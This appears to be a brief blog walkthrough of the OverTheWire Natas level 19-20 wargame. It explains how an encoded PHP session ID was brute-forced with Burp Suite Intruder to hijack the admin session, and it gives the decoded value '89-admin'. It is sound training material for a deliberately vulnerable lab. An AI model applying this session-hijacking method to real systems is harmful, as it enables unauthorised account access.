OVERTHEWIRE NATAS level 19-20 is similar to 18-19 level. We have to manipulate session in order to login as admin. In the last level, we just have to change the PHPSESSIONID number in order to gain the access to the admin account. We have to do the same in this level too but here the PHPSESSIONID is encoded. Let’s dive in the level’s walkthrough!
The hint for this level is pretty forward.
The header for this level looks like this.
If you decode this you will get this:
To carry out this attack, I used burpsuite!
Send the request to the intruder and do the following options:
In the payload tab, set the options as below:
Start the attack!
Here is the screenshot for the request that got us the credentials for the next level!
There you go! password for the next level.
If you hex decode it, the text string is 89-admin.